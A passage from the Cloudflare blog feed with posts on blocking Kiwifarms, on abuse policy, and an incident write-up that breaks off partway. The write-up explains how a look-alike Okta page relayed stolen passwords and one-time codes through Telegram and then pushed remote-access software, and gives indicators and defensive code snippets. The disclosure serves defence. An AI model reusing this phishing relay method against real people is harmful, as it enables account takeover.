    <p>Our mission is to help build a better Internet, and we are proud that more than 20% of the web and 30% of the Fortune 1,000 rely on Cloudflare to be fast, reliable, secure, efficient, and private for whatever they are doing online. Throughout the year we have Innovation Weeks, usually dedicated to new products for our customers. But during our Birthday Week, we give back with products and initiatives that aren’t designed to generate revenue; we provide them because they improve the fundamentals of how the Internet works.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6KLMbiDI9nD9uMjbsZbq2i/6f38c7255b542f51f10644375039b44e/image4-13.png" />
            
            </figure><p>And so this year we'll be launching new services and partnerships to make the best security practices more affordable and bring them more easily to an increasingly mobile world. We're helping developers access more resources they need to deliver the next generation of applications. And we're launching privacy-preserving alternatives to widely used services because we believe a better Internet is a more private Internet.</p><p>We're not ready to declare that it's time for the Ewoks to start dancing, but we are proud of our continued innovation and the thoughtfulness of our team as we navigate these challenging times. Although the global economy continues to provide uncertain headwinds as we head into the new year, we are confident we have the plan and the team that will make us successful.</p><p>Thank you to our team, our customers, and our investors. Happy 12th birthday to Cloudflare. And, as always: we're just getting started.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/65DdtpxOGf3GYUzK4IODA1/85eeb7cfd59f9bba67dd08b0ca5b8c4a/image3-27.png" />
            
            </figure> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <category><![CDATA[Cloudflare History]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">13XWlg4xYVsXIPDfTdrYF9</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Blocking Kiwifarms]]></title>
            <link>https://blog.cloudflare.com/kiwifarms-blocked/</link>
            <pubDate>Sat, 03 Sep 2022 22:15:35 GMT</pubDate>
            <description><![CDATA[ We have blocked Kiwifarms. Visitors to any of the Kiwifarms sites that use any of Cloudflare's services will see a Cloudflare block page and a link to this post.  ]]></description>
            <content:encoded><![CDATA[ <p>We have blocked Kiwifarms. Visitors to any of the Kiwifarms sites that use any of Cloudflare's services will see a Cloudflare block page and a link to this post. Kiwifarms may move their sites to other providers and, in doing so, come back online, but we have taken steps to block their content from being accessed through our infrastructure.</p><p>This is an extraordinary decision for us to make and, given Cloudflare's role as an Internet infrastructure provider, a dangerous one that we are not comfortable with. However, the rhetoric on the Kiwifarms site and specific, targeted threats have escalated over the last 48 hours to the point that we believe there is an unprecedented emergency and immediate threat to human life unlike anything we have previously seen from Kiwifarms or any other customer.</p>
    <div>
      <h3>Escalating threats</h3>
      <a href="#escalating-threats">
        
      </a>
    </div>
    <p>Kiwifarms has frequently been host to revolting content. Revolting content alone does not create an emergency situation that necessitates the action we are taking today. Beginning approximately two weeks ago, a pressure campaign started with the goal of deplatforming Kiwifarms. That pressure campaign targeted Cloudflare as well as other providers utilized by the site.</p><p>Cloudflare provided security services to Kiwifarms, protecting them from DDoS and other cyberattacks. We have never been their hosting provider. <a href="/cloudflares-abuse-policies-and-approach/">As we outlined last Wednesday</a>, we do not believe that terminating security services is appropriate, even for revolting content. In a law-respecting world, the answer to even illegal content is not to use other illegal means like DDoS attacks to silence it.</p><p>We are also not taking this action directly because of the pressure campaign. While we have empathy for its organizers, we are committed as a security provider to protecting our customers even when they run deeply afoul of popular opinion or even our own morals. The <a href="/cloudflares-abuse-policies-and-approach/">policy we articulated last Wednesday remains our policy</a>. We continue to believe that the best way to relegate cyberattacks to the dustbin of history is to give everyone the tools to prevent them.</p><p>However, as the pressure campaign escalated, so did the rhetoric on the Kiwifarms site. Feeling attacked, users of Kiwifarms became even more aggressive. Over the last two weeks, we have proactively reached out to law enforcement in multiple jurisdictions highlighting what we believe are potential criminal acts and imminent threats to human life that were posted to the site.</p>
    <div>
      <h3>Legal process</h3>
      <a href="#legal-process">
        
      </a>
    </div>
    <p>While law enforcement in these areas are working to investigate what we and others reported, unfortunately the process is moving more slowly than the escalating risk. While we believe that in every other situation we have faced — including the Daily Stormer and 8chan — it would have been appropriate as an infrastructure provider for us to wait for legal process, in this case the imminent and emergency threat to human life which continues to escalate causes us to take this action.</p><p>Hard cases make bad law. This is a hard case and we would caution anyone from seeing it as setting precedent. The <a href="/cloudflares-abuse-policies-and-approach/">policies we articulated last Wednesday remain our policies</a>. For an infrastructure provider like Cloudflare, legal process is still the correct way to deal with revolting and potentially illegal content online.</p><p>But we need a mechanism when there is an emergency threat to human life for infrastructure providers to work expediently with legal authorities in order to ensure the decisions we make are grounded in due process. Unfortunately, that mechanism does not exist and so we are making this uncomfortable emergency decision alone.</p>
    <div>
      <h3>Not the end</h3>
      <a href="#not-the-end">
        
      </a>
    </div>
    <p>Finally, we are aware and concerned that our action may only fan the flames of this emergency. Kiwifarms itself will most likely find other infrastructure that allows them to come back online, as the Daily Stormer and 8chan did themselves after we terminated them. And, even if they don't, the individuals who used the site to terrorize others will feel even more isolated and attacked and may lash out further. There is real risk that by taking this action today we may have further heightened the emergency.</p><p>We will continue to work proactively with law enforcement to help with their investigations into the site and the individuals who have posted what may be illegal content to it. And we recognize that while our blocking Kiwifarms temporarily addresses the situation, it by no means solves the underlying problem. That solution will require much more work across society. We are hopeful that our action today will help provoke conversations toward addressing the larger problem. And we stand ready to participate in that conversation.</p>
            <category><![CDATA[Abuse]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">7tWDjvEz0pDvEf8xc8Zk0H</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare's abuse policies & approach]]></title>
            <link>https://blog.cloudflare.com/cloudflares-abuse-policies-and-approach/</link>
            <pubDate>Wed, 31 Aug 2022 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched nearly twelve years ago. Over that time, our set of services has become much more complicated. With that complexity we have developed policies around how we handle abuse of different features Cloudflare provides ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6KFpKT5IYgDuwxdCYL4S1s/babd5693105204319201da5b58e6b98b/The-Cloudflare-Blog-1.png" />
            
            </figure><p>Cloudflare launched nearly twelve years ago. We’ve grown to operate a network that spans more than 275 cities in over 100 countries. We have millions of customers: from small businesses and individual developers to approximately 30 percent of the Fortune 500. Today, more than 20 percent of the web relies directly on Cloudflare’s services.</p><p>Over the time since we launched, our set of services has become much more complicated. With that complexity we have developed policies around how we handle abuse of different Cloudflare features. Just as a broad platform like Google has different abuse policies for search, Gmail, YouTube, and Blogger, Cloudflare has <a href="/out-of-the-clouds-and-into-the-weeds-cloudflares-approach-to-abuse-in-new-products/">developed different abuse policies</a> as we have introduced new products.</p><p>We published our updated approach to abuse last year at:</p><p><a href="https://www.cloudflare.com/trust-hub/abuse-approach/">https://www.cloudflare.com/trust-hub/abuse-approach/</a></p><p>However, as questions have arisen, we thought it made sense to describe those policies in more detail here.  </p><p>The policies we built reflect ideas and recommendations from human rights experts, activists, academics, and regulators. Our guiding principles require abuse policies to be specific to the service being used. This is to ensure that any actions we take both reflect the ability to address the harm and minimize unintended consequences. We believe that someone with an abuse complaint must have access to an abuse process to reach those who can most effectively and narrowly address their complaint — anonymously if necessary. And, critically, we strive always to be transparent about both our policies and the actions we take.</p>
    <div>
      <h3>Cloudflare's products</h3>
      <a href="#cloudflares-products">
        
      </a>
    </div>
    <p>Cloudflare provides a broad range of products that fall generally into three buckets: hosting products (e.g., Cloudflare Pages, Cloudflare Stream, Workers KV, Custom Error Pages), security services (e.g., DDoS Mitigation, Web Application Firewall, Cloudflare Access, Rate Limiting), and core Internet technology services (e.g., Authoritative DNS, Recursive DNS/1.1.1.1, WARP). For a complete list of our products and how they map to these categories, you can see our <a href="https://www.cloudflare.com/trust-hub/abuse-approach/">Abuse Hub</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/0jGLSWqF5X7h8ZGsARPIe/50f3abc20a250a34dbd27647f721de1b/pasted-image-0--2--1.png" />
            
            </figure><p>As described below, our policies take a different approach on a product-by-product basis in each of these categories.</p>
    <div>
      <h3>Hosting products</h3>
      <a href="#hosting-products">
        
      </a>
    </div>
    <p>Hosting products are those products where Cloudflare is the ultimate host of the content. This is different from products where we are merely providing security or temporary caching services and the content is hosted elsewhere. Although many people confuse our security products with hosting services, we have distinctly different policies for each. Because the vast majority of Cloudflare customers do not yet use our hosting products, abuse complaints and actions involving these products are currently relatively rare.</p><p>Our decision to disable access to content in hosting products fundamentally results in that content being taken offline, at least until it is republished elsewhere. Hosting products are subject to our <a href="https://www.cloudflare.com/trust-hub/abuse-approach/">Acceptable Hosting Policy</a>. Under that policy, for these products, we may remove or disable access to content that we believe:</p><ul><li><p>Contains, displays, distributes, or encourages the creation of child sexual abuse material, or otherwise exploits or promotes the exploitation of minors.</p></li><li><p>Infringes on intellectual property rights.</p></li><li><p>Has been determined by appropriate legal process to be defamatory or libelous.</p></li><li><p>Engages in the unlawful distribution of controlled substances.</p></li><li><p>Facilitates human trafficking or prostitution in violation of the law.</p></li><li><p>Contains, installs, or disseminates any active malware, or uses our platform for exploit delivery (such as part of a command and control system).</p></li><li><p>Is otherwise illegal, harmful, or violates the rights of others, including content that discloses sensitive personal information, incites or exploits violence against people or animals, or seeks to defraud the public.</p></li></ul><p>We maintain discretion in how our Acceptable Hosting Policy is enforced, and generally seek to apply content restrictions as narrowly as possible. 
For instance, if a shopping cart platform with millions of customers uses Cloudflare Workers KV and one of their customers violates our Acceptable Hosting Policy, we will not automatically terminate the use of Cloudflare Workers KV for the entire platform.</p><p>Our guiding principle is that organizations closest to content are best at determining when the content is abusive. It also recognizes that overbroad takedowns can have significant unintended impact on access to content online.</p>
    <div>
      <h3>Security services</h3>
      <a href="#security-services">
        
      </a>
    </div>
    <p>The overwhelming majority of Cloudflare's millions of customers use only our security services. Cloudflare made a decision early in our history that we wanted to make security tools as widely available as possible. This meant that we provided many tools for free, or at minimal cost, to best limit the impact and effectiveness of a wide range of cyberattacks. Most of our customers pay us nothing.</p><p>Giving everyone the ability to sign up for our services online also reflects our view that cyberattacks not only should not be used for silencing vulnerable groups, but are not the appropriate mechanism for addressing problematic content online. We believe cyberattacks, in any form, should be relegated to the dustbin of history.</p><p>The decision to provide security tools so widely has meant that we've had to think carefully about when, or if, we ever terminate access to those services. We recognized that we needed to think through what the effect of a termination would be, and whether there was any way to set standards that could be applied in a fair, transparent and non-discriminatory way, consistent with human rights principles.</p><p>This is true not just for the content where a complaint may be filed  but also for the precedent the takedown sets. Our conclusion — informed by all of the many conversations we have had and the thoughtful discussion in the broader community — is that voluntarily terminating access to services that protect against cyberattack is not the correct approach.</p>
    <div>
      <h3>Avoiding an abuse of power</h3>
      <a href="#avoiding-an-abuse-of-power">
        
      </a>
    </div>
    <p>Some argue that we should terminate these services for content we find reprehensible so that others can launch attacks to knock it offline. That is the equivalent, in the physical world, of arguing that the fire department shouldn't respond to fires in the homes of people who do not possess sufficient moral character. Both in the physical world and online, that is a dangerous precedent, and one that is over the long term most likely to disproportionately harm vulnerable and marginalized communities.</p><p>Today, more than 20 percent of the web uses Cloudflare's security services. When considering our policies we need to be mindful of the impact we have and precedent we set for the Internet as a whole. Terminating security services for content that our team personally feels is disgusting and immoral would be the popular choice. But, in the long term, such choices make it more difficult to protect content that supports oppressed and marginalized voices against attacks.</p>
    <div>
      <h3>Refining our policy based on what we’ve learned</h3>
      <a href="#refining-our-policy-based-on-what-weve-learned">
        
      </a>
    </div>
    <p>This isn't hypothetical. Thousands of times per day we receive calls to terminate security services based on content that someone reports as offensive. Most of these don’t make news. Most of the time these decisions don’t conflict with our moral views. Yet two times in the past we decided to terminate content from our security services because we found it reprehensible. In 2017, we terminated the neo-Nazi troll site <a href="/why-we-terminated-daily-stormer/">The Daily Stormer</a>. And in 2019, we terminated the conspiracy theory forum <a href="/terminating-service-for-8chan/">8chan</a>.</p><p>In a deeply troubling response, after both terminations we saw a dramatic increase in authoritarian regimes attempting to have us terminate security services for human rights organizations — often citing the language from our own justification back to us.</p><p>Since those decisions, we have had significant discussions with policy makers worldwide. From those discussions we concluded that the power to terminate security services for the sites was not a power Cloudflare should hold. Not because the content of those sites wasn't abhorrent — it was — but because security services most closely resemble Internet utilities.</p><p>Just as the telephone company doesn't terminate your line if you say awful, racist, bigoted things, we have concluded in consultation with politicians, policy makers, and experts that turning off security services because we think what you publish is despicable is the wrong policy. To be clear, just because we did it in a limited set of cases before doesn’t mean we were right when we did. Or that we will ever do it again.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7tBErj7SMPOb8RTPTfKVam/f785844a18b57a059bdd25a08fe47e54/pasted-image-0--4--3.png" />
            
            </figure><p>But that doesn’t mean that Cloudflare can’t play an important role in protecting those targeted by others on the Internet. We have long supported human rights groups, journalists, and other uniquely vulnerable entities online through <a href="https://www.cloudflare.com/galileo/">Project Galileo</a>. Project Galileo offers free cybersecurity services to nonprofits and advocacy groups that help strengthen our communities.</p><p>Through the <a href="https://www.cloudflare.com/athenian/">Athenian Project</a>, we also play a role in protecting election systems throughout the United States and abroad. Elections are one of the areas where the systems that administer them need to be fundamentally trustworthy and neutral. Making choices on what content is deserving or not of security services, especially in any way that could in any way be interpreted as political, would undermine our ability to provide trustworthy protection of election infrastructure.</p>
    <div>
      <h3>Regulatory realities</h3>
      <a href="#regulatory-realities">
        
      </a>
    </div>
    <p>Our policies also respond to regulatory realities. Internet content regulation laws passed over the last five years around the world have largely drawn a line between services that host content and those that provide security and conduit services. Even when these regulations impose obligations on platforms or hosts to moderate content, they exempt security and conduit services from playing the role of moderator without legal process. This is sensible regulation borne of a thorough regulatory process.</p><p>Our policies follow this well-considered regulatory guidance. We prevent security services from being used by sanctioned organizations and individuals. We also terminate security services for content which is illegal in the United States — where Cloudflare is headquartered. This includes Child Sexual Abuse Material (CSAM) as well as content subject to Fight Online Sex Trafficking Act (FOSTA). But, otherwise, we believe that cyberattacks are something that everyone should be free of. Even if we fundamentally disagree with the content.</p><p>In respect of the rule of law and due process, we follow legal process controlling security services. We will restrict content in geographies where we have received legal orders to do so. For instance, if a court in a country prohibits access to certain content, then, following that court's order, we generally will restrict access to that content in that country. That, in many cases, will limit the ability for the content to be accessed in the country. However, we recognize that just because content is illegal in one jurisdiction does not make it illegal in another, so we narrowly tailor these restrictions to align with the jurisdiction of the court or legal authority.</p><p>While we follow legal process, we also believe that transparency is critically important. To that end, wherever these content restrictions are imposed, we attempt to link to the particular legal order that required the content be restricted. 
This transparency is necessary for people to participate in the legal and legislative process. We find it deeply troubling when ISPs comply with court orders by invisibly blackholing content — not giving those who try to access it any idea of what legal regime prohibits it. Speech can be curtailed by law, but proper application of the Rule of Law requires whoever curtails it to be transparent about why they have.</p>
    <div>
      <h3>Core Internet technology services</h3>
      <a href="#core-internet-technology-services">
        
      </a>
    </div>
    <p>While we will generally follow legal orders to restrict security and conduit services, we have a higher bar for core Internet technology services like Authoritative DNS, Recursive DNS/1.1.1.1, and WARP. The challenge with these services is that restrictions on them are global in nature. You cannot easily restrict them just in one jurisdiction so the most restrictive law ends up applying globally.</p><p>We have generally challenged or appealed legal orders that attempt to restrict access to these core Internet technology services, even when a ruling only applies to our free customers. In doing so, we attempt to suggest to regulators or courts more tailored ways to restrict the content they may be concerned about.</p><p>Unfortunately, these cases are becoming more common, largely driven by copyright holders attempting to get a ruling in one jurisdiction and have it apply worldwide to terminate core Internet technology services and effectively wipe content offline. Again, we believe this is a dangerous precedent to set, placing the control of what content is allowed online in the hands of whatever jurisdiction is willing to be the most restrictive.</p><p>So far, we’ve largely been successful in making arguments that this is not the right way to regulate the Internet and getting these cases overturned. Holding this line, we believe, is fundamental to the healthy operation of the global Internet. But each showing of discretion across our security or core Internet technology services weakens our argument in these important cases.</p>
    <div>
      <h3>Paying versus free</h3>
      <a href="#paying-versus-free">
        
      </a>
    </div>
    <p>Cloudflare provides both free and paid services across all the categories above. Again, the majority of our customers use our free services and pay us nothing.</p><p>Although most of the concerns we see in our abuse process relate to our free customers, we do not have different moderation policies based on whether a customer is free versus paid. We do, however, believe that in cases where our values are diametrically opposed to a paying customer's, we should not only decline to profit from the customer, but use any proceeds to further our company's values and oppose theirs.</p><p>For instance, when a site that opposed LGBTQ+ rights signed up for a paid version of our DDoS mitigation service, we worked with our Proudflare employee resource group to identify an organization that supported LGBTQ+ rights and donate 100 percent of the fees for our services to them. We don't and won't talk about these efforts publicly because we don't do them for marketing purposes; we do them because they are aligned with what we believe is morally correct.</p>
    <div>
      <h3>Rule of Law</h3>
      <a href="#rule-of-law">
        
      </a>
    </div>
    <p>While we believe we have an obligation to restrict the content that we host ourselves, we do not believe we have the political legitimacy to determine generally what is and is not online by restricting security or core Internet services. If that content is harmful, the right place to restrict it is legislatively.</p><p>We also believe that an Internet where cyberattacks are used to silence what's online is a broken Internet, no matter how much we may have empathy for the ends. As such, we will look to legal process, not popular opinion, to guide our decisions about when to terminate our security services or our core Internet technology services.</p><p>In spite of what some may claim, we are not free speech absolutists. We do, however, believe in the Rule of Law. Different countries and jurisdictions around the world will determine what content is and is not allowed based on their own norms and laws. In assessing our obligations, we look to whether those laws are limited to the jurisdiction and consistent with our obligations to respect human rights under the <a href="https://www.ohchr.org/sites/default/files/documents/publications/guidingprinciplesbusinesshr_en.pdf">United Nations Guiding Principles on Business and Human Rights</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3xMuKqx9FMSlG0dQaQB7tY/28a0b309ad48f14256f4200dd852794a/pasted-image-0--3--2.png" />
            
            </figure><p>There remain many injustices in the world, and unfortunately much content online that we find reprehensible. We can solve some of these injustices, but we cannot solve them all. But, in the process of working to improve the security and functioning of the Internet, we need to make sure we don’t cause it long-term harm.</p><p>We will continue to have conversations about these challenges, and how best to approach securing the global Internet from cyberattack. We will also continue to cooperate with legitimate law enforcement to help investigate crimes, to <a href="https://www.cloudflare.com/galileo/">donate funds and services</a> to support equality, human rights, and other causes we believe in, and to participate in policy making around the world to help preserve the free and open Internet.</p> ]]></content:encoded>
            <category><![CDATA[Abuse]]></category>
            <category><![CDATA[Freedom of Speech]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">1dO5CZvpkSasLMSaW3LabY</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Alissa Starzak</dc:creator>
        </item>
        <item>
            <title><![CDATA[The mechanics of a sophisticated phishing scam and how we stopped it]]></title>
            <link>https://blog.cloudflare.com/2022-07-sms-phishing-attacks/</link>
            <pubDate>Tue, 09 Aug 2022 15:56:30 GMT</pubDate>
            <description><![CDATA[ Yesterday, August 8, 2022, Twilio shared that they’d been compromised by a targeted phishing attack. Around the same time as Twilio was attacked, we saw an attack with very similar characteristics also targeting Cloudflare’s employees ]]></description>
            <content:encoded><![CDATA[ <p>Yesterday, August 8, 2022, Twilio shared that they’d been <a href="https://www.twilio.com/blog/august-2022-social-engineering-attack">compromised by a targeted phishing attack</a>. Around the same time as Twilio was attacked, we saw an attack with very similar characteristics also targeting Cloudflare’s employees. While individual employees did fall for the phishing messages, we were able to thwart the attack through our own use of <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One products</a>, and physical security keys issued to every employee that are required to access all our applications.</p><p>We have confirmed that no Cloudflare systems were compromised. Our <a href="/introducing-cloudforce-one-threat-operations-and-threat-research/">Cloudforce One threat intelligence team</a> was able to perform additional analysis to further dissect the mechanism of the attack and gather critical evidence to assist in tracking down the attacker.</p><p>This was a sophisticated attack targeting employees and systems in such a way that we believe most organizations would be likely to be breached. Given that the attacker is targeting multiple organizations, we wanted to share here a rundown of exactly what we saw in order to help other companies recognize and mitigate this attack.</p>
    <div>
      <h2>Targeted Text Messages</h2>
      <a href="#targeted-text-messages">
        
      </a>
    </div>
    <p>On July 20, 2022, the Cloudflare Security team received reports of employees receiving legitimate-looking text messages pointing to what appeared to be a Cloudflare Okta login page. The messages began at 2022-07-20 22:50 UTC. Over the course of less than 1 minute, at least 76 employees received text messages on their personal and work phones. Some messages were also sent to the employees' family members. We have not yet been able to determine how the attacker assembled the list of employees' phone numbers but have reviewed access logs to our employee directory services and have found no sign of compromise.</p><p>Cloudflare runs a 24x7 Security Incident Response Team (SIRT). Every Cloudflare employee is trained to report anything that is suspicious to the SIRT. More than 90 percent of the reports to SIRT turn out not to be threats. Employees are encouraged to report anything and never discouraged from over-reporting. In this case, however, the reports to SIRT were a real threat.</p><p>The text messages received by employees looked like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2NzSGBSGfCogIk4BXWmXND/cb4bc7d2f174f8b360b7c51664e71f66/image3-5.png" />
            
            </figure><p>They came from four phone numbers associated with T-Mobile-issued SIM cards: (754) 268-9387, (205) 946-7573, (754) 364-6683 and (561) 524-5989. They pointed to an official-looking domain: cloudflare-okta.com. That domain had been registered via Porkbun, a <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name-registrar/">domain registrar</a>, at 2022-07-20 22:13:04 UTC — less than 40 minutes before the phishing campaign began.</p><p>Cloudflare built our <a href="https://www.cloudflare.com/products/registrar/custom-domain-protection/">secure registrar product</a> in part to be able to monitor when domains using the Cloudflare brand were registered and get them shut down. However, because this domain was registered so recently, it had not yet been published as a new .com registration, so our systems did not detect its registration and our team had not yet moved to terminate it.</p><p>If you clicked on the link it took you to a phishing page. The phishing page was hosted on DigitalOcean and looked like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/32GWziRZv7ijycvETvNHny/58f811265c86872398b876d64f65a55d/image1-13.png" />
            
            </figure><p>Cloudflare uses Okta as our identity provider. The phishing page was designed to look identical to a legitimate Okta login page. The phishing page prompted anyone who visited it for their username and password.</p>
    <div>
      <h2>Real-Time Phishing</h2>
      <a href="#real-time-phishing">
        
      </a>
    </div>
    <p>We were able to analyze the payload of the <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing attack</a> based on what our employees received as well as its content being posted to services like VirusTotal by other companies that had been attacked. When the phishing page was completed by a victim, the credentials were immediately relayed to the attacker via the messaging service Telegram. This real-time relay was important because the phishing page would also prompt for a Time-based One Time Password (TOTP) code.</p><p>Presumably, the attacker would receive the credentials in real-time, enter them in a victim company’s actual login page, and, for many organizations that would generate a code sent to the employee via SMS or displayed on a password generator. The employee would then enter the TOTP code on the phishing site, and it too would be relayed to the attacker. The attacker could then, before the TOTP code expired, use it to access the company’s actual login page — defeating most two-factor authentication implementations.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6kHLCU7dpKptSuJXwOy39X/0da593615149665ba8f7360e4232a996/image2-6.png" />
            
            </figure>
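<p>To see why a real-time relay defeats TOTP, consider how the codes are computed. An RFC 6238 code is a truncated HMAC over the current 30-second time step, so any code captured and replayed within that window still verifies. Here is a minimal sketch (the shared secret and timestamps are illustrative, not any real seed):</p>

```python
import hmac
import struct

def totp(secret: bytes, at: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: truncated HMAC-SHA1 over the current time-step counter."""
    counter = int(at) // step
    mac = hmac.new(secret, struct.pack(">Q", counter), "sha1").digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

# Illustrative shared secret -- not a real seed.
secret = b"shared-seed"
victim_code = totp(secret, at=1000)    # code the victim types into the phishing page
relayed_code = totp(secret, at=1005)   # five seconds later, after the Telegram relay
assert victim_code == relayed_code     # same 30-second step, so the server accepts it
```

<p>The few seconds of latency a Telegram relay introduces is far less than the code’s lifetime, which is why this style of attack works against TOTP-based two-factor authentication.</p>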
    <div>
      <h2>Protected Even If Not Perfect</h2>
      <a href="#protected-even-if-not-perfect">
        
      </a>
    </div>
    <p>We confirmed that three Cloudflare employees fell for the phishing message and entered their credentials. However, Cloudflare does not use TOTP codes. Instead, every employee at the company is issued a FIDO2-compliant security key from a vendor like YubiKey. Since the hard keys are tied to users and implement <a href="https://www.yubico.com/blog/creating-unphishable-security-key/">origin binding</a>, even a sophisticated, real-time phishing operation like this cannot gather the information necessary to log in to any of our systems. While the attacker attempted to log in to our systems with the compromised username and password credentials, they could not get past the hard key requirement.</p><p>But this phishing page was not simply after credentials and TOTP codes. If someone made it past those steps, the phishing page then initiated the download of a phishing payload which included AnyDesk’s remote access software. That software, if installed, would allow an attacker to control the victim’s machine remotely. We confirmed that none of our team members got to this step. If they had, however, our endpoint security would have stopped the installation of the remote access software.</p>
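<p>The origin binding that protected us here is straightforward to picture. In WebAuthn, the browser — not the user — records the origin of the page requesting authentication in the signed client data, so a response produced on a look-alike domain can never verify against the real one. A simplified relying-party check might look like the following (the expected origin is hypothetical, and full signature verification is omitted):</p>

```python
import json

EXPECTED_ORIGIN = "https://cloudflare.okta.com"   # hypothetical relying-party origin

def check_client_data(client_data_json: bytes, expected_challenge: str) -> bool:
    """Simplified WebAuthn relying-party check (signature verification omitted).
    The browser fills in `origin` itself, and the security key signs over a hash
    of this JSON, so an attacker can neither forge nor strip the field."""
    data = json.loads(client_data_json)
    return (data.get("type") == "webauthn.get"
            and data.get("challenge") == expected_challenge
            and data.get("origin") == EXPECTED_ORIGIN)

# A response captured on the phishing page carries the phishing origin and fails:
phished = json.dumps({"type": "webauthn.get", "challenge": "abc123",
                      "origin": "https://cloudflare-okta.com"}).encode()
assert check_client_data(phished, "abc123") is False
```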
    <div>
      <h2>How Did We Respond?</h2>
      <a href="#how-did-we-respond">
        
      </a>
    </div>
    <p>The main response actions we took for this incident were:</p>
    <div>
      <h3>1. Block the phishing domain using Cloudflare Gateway</h3>
      <a href="#1-block-the-phishing-domain-using-cloudflare-gateway">
        
      </a>
    </div>
    <p>Cloudflare Gateway is a <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway</a> solution providing threat and data protection with DNS / HTTP filtering and natively integrated <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a>. We use this solution internally to proactively identify malicious domains and block them. Our team added the malicious domain to Cloudflare Gateway to block all employees from accessing it.</p><p>Gateway’s automatic detection of malicious domains also identified the domain and blocked it, but because it was registered and the messages were sent within such a short interval, the system hadn’t automatically taken action before some employees had clicked on the links. Given this incident, we are working to speed up how quickly malicious domains are identified and blocked. We’re also implementing controls on access to newly registered domains, which we offer to customers but had not implemented ourselves.</p>
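<p>The newly-registered-domain control is, at its core, a simple age policy. A minimal sketch, assuming registration timestamps are available from a WHOIS/RDAP or zone-file feed (the function and the 24-hour threshold below are illustrative, not Gateway’s actual logic):</p>

```python
from datetime import datetime, timedelta, timezone

MAX_AGE = timedelta(hours=24)   # illustrative threshold

def should_block(domain: str, registered_at: datetime, now: datetime) -> bool:
    """Block (or isolate) any domain whose registration is younger than MAX_AGE.
    In practice registered_at would come from a WHOIS/RDAP or zone-file feed."""
    return now - registered_at < MAX_AGE

# cloudflare-okta.com was registered roughly 36 minutes before the first texts:
registered = datetime(2022, 7, 20, 22, 13, 4, tzinfo=timezone.utc)
first_text = datetime(2022, 7, 20, 22, 49, 0, tzinfo=timezone.utc)
assert should_block("cloudflare-okta.com", registered, first_text)
```

<p>Applied at the time of the attack, a policy like this would have caught the phishing domain well before any automated reputation system could classify it.</p>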
    <div>
      <h3>2. Identify all impacted Cloudflare employees and reset compromised credentials</h3>
      <a href="#2-identify-all-impacted-cloudflare-employees-and-reset-compromised-credentials">
        
      </a>
    </div>
    <p>We were able to compare recipients of the phishing texts to login activity and identify threat-actor attempts to authenticate to our employee accounts. We identified login attempts blocked by the hard key (U2F) requirement, indicating that the correct password was used but the second factor could not be verified. For the three employees whose credentials were leaked, we reset their credentials, revoked any active sessions, and initiated scans of their devices.</p>
    <div>
      <h3>3. Identify and take down threat-actor infrastructure</h3>
      <a href="#3-identify-and-take-down-threat-actor-infrastructure">
        
      </a>
    </div>
    <p>The threat actor's phishing domain was newly registered via Porkbun and hosted on DigitalOcean; it was set up less than an hour before the initial phishing wave. The site had a Nuxt.js frontend and a Django backend. We worked with DigitalOcean to shut down the attacker’s server, and with Porkbun to seize control of the malicious domain.</p><p>From the failed sign-in attempts, we were able to determine that the threat actor was using Mullvad VPN software and, distinctively, the Google Chrome browser on a Windows 10 machine. The VPN IP addresses used by the attacker were 198.54.132.88 and 198.54.135.222. Those IPs are assigned to Tzulo, a US-based dedicated server provider whose website claims it has servers in Los Angeles and Chicago. It appears, however, that the first was actually running on a server in the Toronto area and the latter on a server in the Washington, DC area. We blocked these IPs from accessing any of our services.</p>
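<p>Hunting for this activity in sign-in logs amounts to joining known indicators against authentication events. A minimal sketch, with made-up log records and field names (not Okta’s actual schema):</p>

```python
# Known attacker VPN exit IPs from the failed sign-in attempts.
ATTACKER_IPS = {"198.54.132.88", "198.54.135.222"}

# Hypothetical log records; the field names are illustrative, not Okta's schema.
sign_in_log = [
    {"user": "alice", "ip": "203.0.113.7",    "result": "SUCCESS"},
    {"user": "bob",   "ip": "198.54.132.88",  "result": "MFA_DENIED"},
    {"user": "carol", "ip": "198.54.135.222", "result": "MFA_DENIED"},
]

# Password accepted but the hard-key factor failed, from a known attacker IP:
suspicious = [entry for entry in sign_in_log
              if entry["ip"] in ATTACKER_IPS and entry["result"] == "MFA_DENIED"]

assert [entry["user"] for entry in suspicious] == ["bob", "carol"]
```

<p>Events matching both conditions are exactly the accounts whose passwords should be reset and sessions revoked.</p>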
    <div>
      <h3>4. Update detections to identify any subsequent attack attempts</h3>
